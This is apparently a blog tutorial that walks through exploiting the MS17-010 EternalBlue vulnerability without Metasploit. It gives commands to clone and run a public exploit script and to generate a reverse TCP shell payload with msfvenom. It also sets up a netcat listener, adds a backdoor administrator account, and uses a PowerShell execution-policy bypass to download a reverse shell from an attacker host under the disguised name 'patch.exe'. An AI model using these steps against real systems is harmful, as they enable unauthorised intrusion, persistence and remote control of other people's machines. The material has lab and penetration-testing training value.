How to Exploit MS17-010 Eternal Blue without Metasploit

Everyone knows how to use the Metasploit exploit for Eternal Blue, or M17-010, but how do you do it without it? This is how to exploit MS17-010 without Metasploit.

The first step is to get the exploit from this github repository. I’ll actually use the same script to move the whoami Windows binary to the victim machine. This binary is found in /usr/share/windows-binaries.

Interested in writing a Python reverse http shell? See Learn Python By Writing A Reverse HTTP Shell In Kali Linux.

Let’s get the exploit script from the Github repo by using this command: git clone https://github.com/helviojunior/MS17-010

Send the exploit using this command: send_and_execute.py $ip reverse-shell.exe

What is reverse-shell.exe? This is the payload I create for a reverse TCP shell. Notice how the payload generation does not include meterpreter. Creates your payload with this command: msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 EXITFUNC=thread -f exe -a x86 –platform windows -o reverse-shell.exe

Now listening after using the command to start a netcat listener: nc -lvp 443.

Exploit Eternal Blue Without Metasploit

Once we send the payload it will execute and be prepared to get a reverse shell connection.

The exploit will run and send a shell back to your listener.

Windows Privilege Escalation And Persistence

Windows privilege escalation is an art in as much as it is a science. Typically if you have enough privilege you can add new users and ultimately add new users to the Administrators group.

C:\Windows\System32>C:\Windows\System32>net user /add evil password            
net user /add evil password
The command completed successfully.
C:\Windows\System32>net localgroup administrators evil /add
net localgroup administrators evil /add
The command completed successfully.

If you wanted to try this another way you could attempt to send the exploit to the target once you already have a shell on the system. Since this is a kernel-level exploit, even if you are running as a low level user it should escalate privileges to administrator.

Moving files from attacker machine to victim machine is another art. It is a practice in which ingenuity and creativity pays off as the installed programs on the victim machine can be few and many and far in between.

C:\Windows\System32>powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')

That’s how it is done. You can exploit MS17-010, the Eternal Blue vulnerability (thanks alot Microsoft) without using Metasploit.